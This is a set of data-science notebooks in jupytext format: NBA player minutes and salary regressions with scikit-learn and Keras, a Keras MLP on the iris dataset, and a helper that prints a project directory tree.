from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
## Predicting the Test set results
y_pred = regressor.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# Multiple linear regression is well adapted to the dataset.
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# SG: ~ 96%
# ## Input 21 col of values (X) to get minutes played.
# Each value has been passed through regressor to predict how much minutes have been played. Afterwards, we will use predicted minutes played to salary with linear regression.
# example of x passing = [5,26,64,2,120,291,0.412,40,120,0.333,69,94,0.734,17,106,123,124,70,18,53,98,349]
# NOTE(review): the label string below ('Predicted Stock Index Price') looks
# copied from a stock-price tutorial; the value predicted here is minutes
# played — confirm and consider renaming the label.
Prediction_result = ('Predicted Stock Index Price: ', regressor.predict(X))
Prediction_result
# Add predicts to MIN_PREDICTIONS (MIN_PRED) column for all
default_rank['MIN_PRED'] = Prediction_result[1]
default_rank['MIN_PRED'] = round(default_rank['MIN_PRED'], 2)
# RISIDUAL (column name kept as-is) = predicted-to-actual minutes ratio.
default_rank['RISIDUAL'] = round(default_rank['MIN_PRED']/default_rank['MIN'], 3)
# Regression 2
# ### MIN_PRED will be in a dataframe with injuries, bmi rank, all risidual rankings, PLAYER_ID, PLAYER_NAME, SEASON_ID, INFLATION
# this dataframe will run another multiple linear regression. The dependent var will be salary.
# Seperating all the data by position may not be necessary. We could possibly run this model workflow on the full dataset.
# ## Separate by Position
# +
# default_rank = default_rank[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID',
# 'YEAR', 'YIL', 'ROUND_NUMBER',
# 'OVERALL_PICK', 'GP', 'GS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN',
# 'MIN_PRED', 'RISIDUAL','INFLATION']]
# -
default_rank = default_rank[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID',
'YEAR', 'PLAYER_AGE', 'YIL', 'ROUND_NUMBER',
'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A',
'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL',
'BLK', 'TOV', 'PF', 'PTS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN',
'MIN_PRED', 'RISIDUAL','INFLATION']]
position_all = default_rank.copy()
# +
position_c = default_rank[default_rank['POSITION'] == 'C']
position_sg = default_rank[default_rank['POSITION'] == 'SG']
position_sf = default_rank[default_rank['POSITION'] == 'SF']
position_pf = default_rank[default_rank['POSITION'] == 'PF']
position_pg = default_rank[default_rank['POSITION'] == 'PG']
position_f = default_rank[default_rank['POSITION'] == 'F']
position_g = default_rank[default_rank['POSITION'] == 'G']
# + [markdown] heading_collapsed=true
# ### Position C
# + hidden=true
position_c.columns
# + hidden=true
position_c = position_c[['PLAYER_ID', 'POSITION', 'PLAYER_NAME','PHOTO', 'SEASON_ID', 'YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'GP', 'GS', 'REB',
'AST', 'STL', 'PTS', 'MIN_PRED', 'PER', 'ALLSTAR', 'INJURY_PY',
'INFLATION']]
### Position C
dataset_c = position_c.dropna(thresh=3)
# 5 YIL projection on players without 5 years in the league
dataset_test_yil = position_c.dropna(thresh=3).copy()
dataset_test_yil.iloc[:, 6] = 5
x_test_yil = dataset_test_yil.iloc[:, 5:-1].values
## Multiple Linear Regressions
X = dataset_c.iloc[:, 5:-1].values
y = dataset_c.iloc[:, -1].values
# + hidden=true
# + hidden=true
## Check correlation to features
train_data = dataset_c.iloc[:, 5:]
# train_data['INFLATION'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# + hidden=true
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 50)
# + hidden=true
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor_c = LinearRegression()
regressor_c.fit(X_train, y_train)
# + hidden=true
## Predicting the Test set results
y_pred = regressor_c.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# + hidden=true
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# + hidden=true
x_test_yil
# + hidden=true
# Prediction_result2 = ('Predicted Stock Index Price: ', regressor_c.predict(X))
regressor_c_result2 = regressor_c.predict(X)
regressor_c_result3 = regressor_c.predict(x_test_yil)
# + hidden=true
# Add salary prediction to SALARY_PREDICTIONS (SAL_PRED) column
# YIL DEFAULT
position_c['SAL_PRED'] = regressor_c_result2
position_c['SAL_PRED'] = round(position_c['SAL_PRED'], 0)
position_c['SAL_RISIDUAL'] = round(position_c['SAL_PRED']/position_c['INFLATION'], 2)
# YIL = 5
position_c_5 = position_c.copy()
position_c_5['SAL_PRED'] = regressor_c_result3
position_c_5['SAL_PRED'] = round(position_c_5['SAL_PRED'], 0)
position_c_5['SAL_RISIDUAL'] = round(position_c_5['SAL_PRED']/position_c_5['INFLATION'], 2)
# + [markdown] heading_collapsed=true hidden=true
# #### Analysis on POSITION C
# + hidden=true
position_c[position_c['INFLATION'] > 2].sort_values(by='SAL_RISIDUAL', ascending=False)
position_c_5[(position_c_5['INFLATION'] > 2)&(position_c_5['YEAR'] > 2000)].sort_values(by=['PER','SAL_RISIDUAL'], ascending=False)
# + hidden=true
# One player search
# position_c_5[position_c_5['PLAYER_NAME'] == '<NAME>'].sort_values(by='YEAR')
# + hidden=true
# model.evaluate()
# + [markdown] heading_collapsed=true
# ### position_sg
# + hidden=true
default_rank.columns
# + hidden=true
position_sg.columns
# + hidden=true
position_sg = position_sg[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'SEASON_ID', 'YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG3M',
'AST', 'PTS', 'MIN_PRED', 'PER', 'ALLSTAR', 'INJURY_PY',
'INFLATION']]
### Position SG
dataset_sg = position_sg.dropna(thresh=3)
# 5 YIL projection on players without 5 years in the league
dataset_test_yil = position_sg.dropna(thresh=3).copy()
dataset_test_yil.iloc[:, 6] = 5
x_test_yil = dataset_test_yil.iloc[:, 5:-1].values
## Multiple Linear Regressions
X = dataset_sg.iloc[:, 5:-1].values
y = dataset_sg.iloc[:, -1].values
# + hidden=true
## Check correlation to features
train_data = dataset_sg.iloc[:, 4:]
# train_data['INFLATION'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# + hidden=true
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 20)
# + hidden=true
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor_sg = LinearRegression()
regressor_sg.fit(X_train, y_train)
# + hidden=true
## Predicting the Test set results
y_pred = regressor_sg.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
# + hidden=true
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# + hidden=true
# Prediction_result2 = ('Predicted Stock Index Price: ', regressor_c.predict(X))
regressor_sg_result2 = regressor_sg.predict(X)
regressor_sg_result3 = regressor_sg.predict(x_test_yil)
# + hidden=true
# Add salary prediction to SALARY_PREDICTIONS (SAL_PRED) column
# YIL DEFAULT
position_sg['SAL_PRED'] = regressor_sg_result2
position_sg['SAL_PRED'] = round(position_sg['SAL_PRED'], 0)
position_sg['SAL_RISIDUAL'] = round(position_sg['SAL_PRED']/position_sg['INFLATION'], 2)
# YIL = 5
position_sg_5 = position_sg.copy()
position_sg_5['SAL_PRED'] = regressor_sg_result3
# BUG FIX: the original rounded position_sg's predictions here, overwriting
# the YIL=5 predictions (regressor_sg_result3) just assigned above — a
# copy-paste slip from the default branch. The parallel position_c cell
# correctly uses position_c_5 throughout; this now matches it.
position_sg_5['SAL_PRED'] = round(position_sg_5['SAL_PRED'], 0)
position_sg_5['SAL_RISIDUAL'] = round(position_sg_5['SAL_PRED']/position_sg_5['INFLATION'], 2)
# + [markdown] hidden=true
# #### Analysis on POSITION SG
# + hidden=true
# Consistency fix: filter position_sg by its own YEAR column (the original
# mixed a position_sg_5 mask into the position_sg selection; identical values
# since the copy, but fragile if either frame is re-filtered).
position_sg[(position_sg['INFLATION'] > 2)&(position_sg['YEAR'] > 2000)].sort_values(by='SAL_RISIDUAL', ascending=False)
position_sg_5[(position_sg_5['INFLATION'] > 2)&(position_sg_5['YEAR'] > 2000)].sort_values(by=['PER','SAL_RISIDUAL'], ascending=False)
# + hidden=true
# + hidden=true
# -
# ### All
position_all
# +
# dataset = position name
dataset2 = position_all.dropna(thresh=3)
# 5 YIL projection on players without 5 years in the league
dataset_test_yil = position_all.dropna(thresh=3).copy()
dataset_test_yil = dataset_test_yil[(dataset_test_yil['YEAR'] > 2019) & (dataset_test_yil['YIL'] <= 3)& (dataset_test_yil['INFLATION'] > 3)]
dataset_test_yil.iloc[:, 7] = 5
x_test_yil = dataset_test_yil.iloc[:, 5:-1].values
## Multiple Linear Regressions
X = dataset2.iloc[:, 5:-1].values
y = dataset2.iloc[:, -1].values
# +
# dataset_test_yil = dataset_test_yil[(dataset_test_yil['YEAR'] > 2019) & (dataset_test_yil['YIL'] <= 3)& (dataset_test_yil['INFLATION'] > 3)]
# +
# dataset2.iloc[:, 6]
# -
x_test_yil[0][0]
# +
## Check correlation to features
train_data = dataset2.iloc[:, 4:]
# train_data['INFLATION'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# -
## Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test,y_train, y_test = train_test_split(X, y, test_size = 0.10, random_state = 2)
## Training the Multiple Linear Regression model on the Training set
from sklearn.linear_model import LinearRegression
regressor2 = LinearRegression()
regressor2.fit(X_train, y_train)
## Predicting the Test set results
y_pred = regressor2.predict(X_test)
np.set_printoptions(precision=2)
print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
## R-Square Coefficient
from sklearn.metrics import r2_score
r2_score(y_test, y_pred)
# ##### SG: ~40%
# Prediction_result2 = ('Predicted Stock Index Price: ', regressor2.predict(X))
Prediction_result2 = regressor2.predict(X)
Prediction_result3 = regressor2.predict(x_test_yil)
# +
# Add salary prediction to SALARY_PREDICTIONS (SAL_PRED) column
dataset2['SAL_PRED'] = Prediction_result2
dataset2['SAL_PRED'] = round(dataset2['SAL_PRED'], 0)
dataset2['SAL_RISIDUAL'] = round(dataset2['SAL_PRED']/dataset2['INFLATION'], 2)
dataset3 = dataset_test_yil.copy()
dataset3['SAL_PRED'] = Prediction_result3
# *1.2 = annual increase not factored into salary before.
# Use this info to create a min salary difference column to help with regression
dataset3['SAL_PRED'] = round(dataset3['SAL_PRED'], 0)
dataset3['SAL_RISIDUAL'] = round(dataset3['SAL_PRED']/dataset3['INFLATION'], 2)
# dataset3['SAL_PRED'] = (dataset3['SAL_PRED']*1.19)
# +
## Save 2020_yil_3_per_only.json
all_data_saved=dataset2.to_csv('../../datasets/all_data_saved_clean.csv', index=False)
# (orient='split')
# SAVE: Player_position
# with open(f'../../datasets/all_data_saved_clean.csv', 'w') as fp:
# json.dump(all_data_saved, fp)
# -
# ## NEED
#
# Possibly create a year 3, 4,5,6 contract for first 5 years.
# Will eventually do the same for 10 year.
# ### YIL = dataset default
# 2020 Season. 3 Years in the league. Sorted by Predicted Salary then PER.
# ds2 = dataset2[(dataset2['SEASON_ID'] == '2019-20') & (dataset2['YIL'] <= 3)].sort_values(by=['PER','YIL'], ascending=False)
ds2 = dataset2[(dataset2['YEAR'] > 2019) & (dataset2['YIL'] <= 3)& (dataset2['INFLATION'] > 3)].sort_values(by=['SAL_PRED','PER'], ascending=False)
_2020_yil_3_per_only_save = ds2.head(10)
_2020_yil_3_per_only_save
# +
## Save 2020_yil_3_per_only.json
_2020_yil_3_per_only_save=_2020_yil_3_per_only_save.to_json(orient='records')
# SAVE: Player_position
with open(f'../../datasets/_2020_yil_3_per_only_save.json', 'w') as fp:
json.dump(_2020_yil_3_per_only_save, fp)
# -
top_2020_yil_3 = ds2[['POSITION', 'PLAYER_NAME', 'YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'MIN_PRED', 'PER', 'INJURY_PY',
'INFLATION', 'SAL_PRED', 'SAL_RISIDUAL']]
top_2020_yil_3.sort_values(by=['SAL_PRED','PER', 'SAL_RISIDUAL'], ascending=False).head(10)
# ### Same but all players in 20 years
ds2_all = dataset2[(dataset2['YIL'] <= 3)& (dataset2['INFLATION'] > 3)].sort_values(by=["YIL","PER"], ascending=False)
_2020_yil_all_per_save = ds2_all.head(10)
# +
## Save 2020_yil_3_per_only.json
_2020_yil_all_per_save=_2020_yil_all_per_save.to_json(orient='records')
# SAVE: Player_position
with open(f'../../datasets/_2020_yil_all_per_save.json', 'w') as fp:
json.dump(_2020_yil_all_per_save, fp)
# +
# ds2 = ds2.set_index("PLAYER_NAME")
# ds2[ds2['PLAYER_ID'] == 1629029]
# -
ds2[ds2['PLAYER_NAME'] == '<NAME>']
# +
#######
## Top 20
# ds2.head(20)
# -
type(dataset3['YIL'][0])
# ### YIL = 5
# ds3 = dataset3[(dataset3['YEAR'] > 2019) & (dataset3['INFLATION'] > 3) ]
ds3 = dataset3[dataset3['INFLATION'] > 3]
# +
# ds3 = dataset3[(dataset3['YEAR'] > 2019) & (dataset3['YIL'] <= 3)& (dataset3['INFLATION'] > 3)].sort_values(by=['PER','YIL'], ascending=False)
# ds3
# -
top_2020_yil_5 = ds3[['POSITION', 'PLAYER_NAME', 'PHOTO','YEAR', 'YIL',
'ROUND_NUMBER', 'OVERALL_PICK', 'MIN_PRED', 'PER', 'INJURY_PY',
'INFLATION', 'SAL_PRED', 'SAL_RISIDUAL']].reset_index(drop=True)
top_2020_yil_5
# +
# ## Save top_2020_yil_5.json
# top_2020_yil_5_save=top_2020_yil_5.to_json(orient='records')
# # SAVE: Player_position
# with open(f'../../datasets/top_2020_yil_5.json', 'w') as fp:
# json.dump(top_2020_yil_5_save, fp)
# -
# # RUN HERE
# -------------
# + [markdown] heading_collapsed=true
# ## Linear Regression
# + hidden=true
# Assign the data to X and y
X = twenty_years_all_players[["MIN", "GP"]]
y = twenty_years_all_players["PPGP"].values.reshape(-1, 1)
print(X.shape, y.shape)
# + hidden=true
# Use train_test_split to create training and testing data
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# Create the model using LinearRegression
from sklearn.linear_model import LinearRegression
model = LinearRegression()
# + hidden=true
# Fit the model to the training data and calculate the scores for the training and testing data
model.fit(X_train, y_train)
training_score = model.score(X_train, y_train)
testing_score = model.score(X_test, y_test)
print(f"Training Score: {training_score}")
print(f"Testing Score: {testing_score}")
# + hidden=true
# Plot the Residuals for the Training and Testing data
# Use `model.predict()` to get a prediction array from X_train and X_test
y_train_prediction = model.predict(X_train)
y_test_prediction = model.predict(X_test)
# Plot the residual
plt.scatter(y_train_prediction, y_train_prediction - y_train, c="blue", label="Training Data (Points)")
plt.scatter(y_test_prediction, y_test_prediction - y_test, c="orange", label="Testing Data (MIN, GP)")
plt.legend()
plt.hlines(y=0, xmin=y.min(), xmax=y.max())
plt.title("Residual Plot")
# + hidden=true
# + [markdown] hidden=true
# --------------------------
# + [markdown] heading_collapsed=true
# ## Logistic Regression
# * Assiging 'dummies'.
# Creating columns for logistic regression out of categorical data in specific columns. ex: positon of player
# + hidden=true
# twenty_years_all_players
# + hidden=true
ml_test = twenty_years_all_players.drop(columns=['PLAYER_NAME','TEAM_ABBREVIATION','SEASON_ID'])
# + hidden=true
ml_test2 = pd.get_dummies(ml_test)
ml_test2.columns = ml_test2.columns.str.replace(' ','')
ml_test2.head()
# + [markdown] hidden=true
# OREB: Offensive Rebounds
# DREB: Defensive Rebounds
# REB: Rebounds
# AST: Assists
# TOV: Turnovers
# STL: Steals
# BLK: Blocks
# + hidden=true
X = ml_test2[["MIN", "GP"]]
# Select the 'FEV' column for y, and then use values.reshape() to reshape it to a 2d array
y = ml_test2["POSITION_C"].values.reshape(-1, 1)
# + hidden=true
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1, test_size=0.33,)
# + hidden=true
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression()
classifier
# + hidden=true
classifier.fit(X_train, y_train)
# + hidden=true
print(f"Training Data Score: {classifier.score(X_train, y_train)}")
print(f"Testing Data Score: {classifier.score(X_test, y_test)}")
# + hidden=true
# + hidden=true
# Generate a new data point (the red circle)
import numpy as np
new_data = np.array([[800, 36]])
plt.scatter(X.iloc[:, 0], X.iloc[:, 1], c=y)
plt.scatter(new_data[0, 0], new_data[0, 1], c="r", marker="o", s=100)
# + hidden=true
# Predict the class (purple or yellow) of the new data point
predictions = classifier.predict(new_data)
print("Classes are either 0 (purple) or 1 (yellow)")
print(f"The new point was classified as: {predictions}")
# + hidden=true
# + hidden=true
predictions = classifier.predict(X_test)
pd.DataFrame({"Prediction": predictions, "Actual": y_test})
# + [markdown] hidden=true
# ----------
# + [markdown] heading_collapsed=true
# ## TEST: DNN for regression
# https://towardsdatascience.com/deep-neural-networks-for-regression-problems-81321897ca33
# + hidden=true
X = ml_test2[["MIN", "GP"]]
# Select the 'FEV' column for y, and then use values.reshape() to reshape it to a 2d array
y = ml_test2["POSITION_C"].values.reshape(-1, 1)
# + hidden=true
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=101, test_size=0.33)
# + hidden=true
# + hidden=true
def get_cols_with_no_nans(df, col_type):
    """Return the names of df's columns of the requested kind that contain no NaNs.

    Arguments:
        df: the DataFrame to inspect.
        col_type:
            'num'    -- numerical (non-object) columns only
            'no_num' -- non-numerical (object) columns only
            'all'    -- every column
    Returns 0 (legacy sentinel) when col_type is not one of the above.
    """
    if col_type == 'num':
        candidates = df.select_dtypes(exclude=['object'])
    elif col_type == 'no_num':
        candidates = df.select_dtypes(include=['object'])
    elif col_type == 'all':
        candidates = df
    else:
        print('Error : choose a type (num, no_num, all)')
        return 0
    # Keep original column order; a column qualifies only if it has no nulls.
    return [name for name in candidates.columns if not df[name].isnull().any()]
# + hidden=true
# define a function to get the columns that don’t have any missing values
num_cols = get_cols_with_no_nans(ml_test2 , 'num')
cat_cols = get_cols_with_no_nans(ml_test2 , 'no_num')
# + hidden=true
print ('Number of numerical columns with no nan values :',len(num_cols))
print ('Number of nun-numerical columns with no nan values :',len(cat_cols))
# + hidden=true
combined = ml_test2[num_cols + cat_cols]
combined.hist(figsize = (12,10))
plt.show()
# + hidden=true
import seaborn as sb
# + hidden=true
train_data = combined[num_cols + cat_cols]
train_data['POSITION_C'] = y
C_mat = train_data.corr()
fig = plt.figure(figsize = (15,15))
sb.heatmap(C_mat, vmax = .8, square = True)
plt.show()
# + hidden=true
def oneHotEncode(df, colNames):
    """One-hot encode each object-dtype column listed in colNames.

    Non-object columns in colNames are left untouched. Each encoded column
    is replaced by its prefixed dummy columns; returns the resulting frame.
    """
    for name in colNames:
        if df[name].dtype != np.dtype('object'):
            continue
        encoded = pd.get_dummies(df[name], prefix=name)
        df = pd.concat([df, encoded], axis=1)
        # Drop the column that was just expanded into dummies.
        df.drop([name], axis=1, inplace=True)
    return df
print('There were {} columns before encoding categorical features'.format(combined.shape[1]))
combined = oneHotEncode(combined, cat_cols)
print('There are {} columns after encoding categorical features'.format(combined.shape[1]))
# + hidden=true
def split_combined():
    """Split the module-level `combined` frame into train/test by row position.

    NOTE(review): the fixed 1460-row cut looks copied from a tutorial with a
    fixed-size dataset — confirm it matches this data's actual train/test
    boundary before relying on it.
    """
    global combined
    train = combined[:1460]
    test = combined[1460:]
    return train , test
train, test = split_combined()
# + [markdown] hidden=true
# -----------
# + [markdown] heading_collapsed=true
# ## TEST: DNN.
# Sequential model, dense layers, relu as activation function for hidden layers, normal initializer as kernel_initializer. Mean absolute error as loss function. Linear as activation function for output
# + hidden=true
# first, create a normal neural network with 2 inputs, 6 hidden nodes, and 2 outputs
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.utils import to_categorical
# + hidden=true
from sklearn.preprocessing import StandardScaler
# Create a StandardScater model and fit it to the training data
X_scaler = StandardScaler().fit(X_train)
# + hidden=true
# Transform the training and testing data using the X_scaler
X_train_scaled = X_scaler.transform(X_train)
X_test_scaled = X_scaler.transform(X_test)
# + hidden=true
# One-hot encoding
y_train_categorical = to_categorical(y_train)
y_test_categorical = to_categorical(y_test)
# + hidden=true
# first, create a normal neural network with 2 inputs, 6 hidden nodes, and 2 outputs
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
import tensorflow as tf
model = Sequential()
model.add(Dense(units=6, activation='relu', input_dim=2, name='hidden'))
model.add(Dense(units=2, activation='softmax', name='output'))
# + hidden=true
model.summary()
# + hidden=true
# Compile the model
model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
# + hidden=true
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
session = tf.compat.v1.Session(config=config)
# + hidden=true
# Fit the model to the training data
model.fit(
X_train_scaled,
y_train_categorical,
validation_data=(X_test_scaled, y_test_categorical),
epochs=60,
shuffle=True,
verbose=2
)
# + hidden=true
# + [markdown] heading_collapsed=true hidden=true
# ### TEST: Deep Learning
# + hidden=true
deep_model = Sequential(name='deep_model')
deep_model.add(Dense(units=6, activation='relu', input_dim=2, name='hidden'))
deep_model.add(Dense(units=6, activation='relu', name='hidden_2'))
deep_model.add(Dense(units=2, activation='softmax', name='output'))
# + hidden=true
deep_model.summary()
# + hidden=true
# deep_model.compile(optimizer='adam',
# loss='categorical_crossentropy',
# metrics=['accuracy'])
# deep_model.compile(optimizer='adam',
# loss='mean_absolute_error',
# metrics=['mean_absolute_error'])
# deep_model.fit(
# X_train_scaled,
# y_train_categorical,
# validation_data=(X_test_scaled, y_test_categorical),
# epochs=100,
# shuffle=True,
# verbose=2
# )
# + hidden=true
deep_model.compile(optimizer='adam',
loss='categorical_crossentropy',
metrics=['accuracy'])
deep_model.fit(
X_train_scaled,
y_train_categorical,
validation_data=(X_test_scaled, y_test_categorical),
epochs=100,
shuffle=True,
verbose=2
)
# + [markdown] heading_collapsed=true hidden=true
# ### Compare the models below
# + hidden=true
model_loss, model_accuracy = model.evaluate(
X_test_scaled, y_test_categorical, verbose=2)
print(
f"Normal Neural Network - Loss: {model_loss}, Accuracy: {model_accuracy}")
# + hidden=true
model_loss, model_accuracy = deep_model.evaluate(
X_test_scaled, y_test_categorical, verbose=2)
print(f"Deep Neural Network - Loss: {model_loss}, Accuracy: {model_accuracy}")
# + hidden=true
# + [markdown] hidden=true
# -----------------
# + hidden=true
import tensorflow.keras as keras
# + hidden=true
checkpoint_name = 'Weights-{epoch:03d}--{val_loss:.5f}.hdf5'
checkpoint = ModelCheckpoint(checkpoint_name, monitor='val_loss', verbose = 1, save_best_only = True, mode ='auto')
callbacks_list = [checkpoint]
# + hidden=true
# + hidden=true
# + hidden=true
# + hidden=true
# + [markdown] hidden=true
# --------
# + hidden=true
# Ridge model
# Note: Use an alpha of .01 when creating the model for this activity
from sklearn.linear_model import Ridge
### BEGIN SOLUTION
ridge = Ridge(alpha=.01)
ridge.fit(X_train_scaled, y_train_scaled)
predictions = ridge.predict(X_test_scaled)
MSE = mean_squared_error(y_test_scaled, predictions)
r2 = ridge.score(X_test_scaled, y_test_scaled)
### END SOLUTION
print(f"MSE: {MSE}, R2: {r2}")
# + hidden=true
# ElasticNet model
# Note: Use an alpha of .01 when creating the model for this activity
from sklearn.linear_model import ElasticNet
### BEGIN SOLUTION
elasticnet = ElasticNet(alpha=.01)
elasticnet.fit(X_train_scaled, y_train_scaled)
predictions = elasticnet.predict(X_test_scaled)
MSE = mean_squared_error(y_test_scaled, predictions)
r2 = elasticnet.score(X_test_scaled, y_test_scaled)
### END SOLUTION
print(f"MSE: {MSE}, R2: {r2}")
# + [markdown] hidden=true
# ---------------
|
group_files/cpompa/notebooks/4-nba-ml-multi-linear-regression.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Trains a simple deep NN on the IRIS dataset.
#
#
import tensorflow as tf
import numpy as np
from tensorflow.python import keras
from tensorflow.python.keras.datasets import mnist
from tensorflow.python.keras.models import Sequential
from tensorflow.python.keras.layers import Dense, Dropout
from tensorflow.python.keras.optimizers import RMSprop
batch_size = 50
num_classes = 3
epochs = 200
# +
import pandas as pd
iris=pd.read_csv("./iris_data/iris.csv")
# Shuffling
iriss=iris.sample(frac=1).reset_index(drop=True)
iris_train=iriss.iloc[0:100,:]
iris_test=iriss.iloc[100:150,:]
x_train=iris_train.iloc[:,0:4].values
x_test=iris_test.iloc[:,0:4].values
y_train=iris_train.iloc[:,4:5]
y_test=iris_test.iloc[:,4:5]
# encoder={k:v for v,k in enumerate(y_train.drop_duplicates())}
# encoder
sets=iris.iloc[:,4:5].drop_duplicates()["Species"].tolist()
encoder={k:v for v,k in enumerate(sets)}
y_train=[ encoder[i] for i in y_train["Species"].tolist() ]
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test=[ encoder[i] for i in y_test["Species"].tolist() ]
y_test = keras.utils.to_categorical(y_test, num_classes)
# -
# Check the shape of each dataset split.
print(x_train.shape,y_train.shape,x_test.shape,y_test.shape)
# +
model = Sequential()
model.add(Dense(30, activation='relu', input_shape=(4,)))
model.add(Dropout(0.2))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.2))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
# -
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
|
6.KerasBasic/MLP_iris/MLP_iris.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import os
# +
from pathlib import Path
class DisplayablePath(object):
    """Render a directory tree as text with box-drawing prefixes.

    ``make_tree`` walks a root directory (depth-first, case-insensitively
    sorted) and yields one ``DisplayablePath`` per entry; ``displayable``
    turns an entry into a line such as ``├── name`` / ``└── name/`` with
    ``│`` continuation bars for ancestor levels.

    Fix: the original defined the ``displayname`` property twice
    (identical bodies); the dead duplicate has been removed.
    """

    display_filename_prefix_middle = '├──'
    display_filename_prefix_last = '└──'
    display_parent_prefix_middle = '    '
    display_parent_prefix_last = '│   '

    def __init__(self, path, parent_path, is_last):
        """Wrap *path*; *parent_path* is the parent node (or None for the root),
        *is_last* marks the last sibling at this level."""
        self.path = Path(str(path))
        self.parent = parent_path
        self.is_last = is_last
        if self.parent:
            self.depth = self.parent.depth + 1
        else:
            self.depth = 0

    @property
    def displayname(self):
        """Entry name; directories get a trailing '/'."""
        if self.path.is_dir():
            return self.path.name + '/'
        return self.path.name

    @classmethod
    def make_tree(cls, root, parent=None, is_last=False, criteria=None):
        """Yield DisplayablePath nodes for *root* and (recursively) its
        children that satisfy *criteria* (a predicate on Path; default:
        accept everything). Children are sorted case-insensitively."""
        root = Path(str(root))
        criteria = criteria or cls._default_criteria
        displayable_root = cls(root, parent, is_last)
        yield displayable_root
        children = sorted(list(path
                               for path in root.iterdir()
                               if criteria(path)),
                          key=lambda s: str(s).lower())
        count = 1
        for path in children:
            is_last = count == len(children)
            if path.is_dir():
                yield from cls.make_tree(path,
                                         parent=displayable_root,
                                         is_last=is_last,
                                         criteria=criteria)
            else:
                yield cls(path, displayable_root, is_last)
            count += 1

    @classmethod
    def _default_criteria(cls, path):
        # Default filter: include every entry.
        return True

    def displayable(self):
        """Return this entry's display line, including ancestor bars."""
        if self.parent is None:
            return self.displayname
        _filename_prefix = (self.display_filename_prefix_last
                            if self.is_last
                            else self.display_filename_prefix_middle)
        parts = ['{!s} {!s}'.format(_filename_prefix,
                                    self.displayname)]
        # Walk up the ancestry, prepending a bar (or blank) per level.
        parent = self.parent
        while parent and parent.parent is not None:
            parts.append(self.display_parent_prefix_middle
                         if parent.is_last
                         else self.display_parent_prefix_last)
            parent = parent.parent
        return ''.join(reversed(parts))
# -
p = os.getcwd()
ignore = ['data-processed', 'dataset', 'Kaggle-RecSys-101', 'dataset-original']
paths = DisplayablePath.make_tree(
Path(p),
criteria=lambda path: True if path.name not in (ignore) else False)
for path in paths:
print(path.displayable())
|
make-project-tree.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: PredictiveMaintenance dlvmjme
# language: python
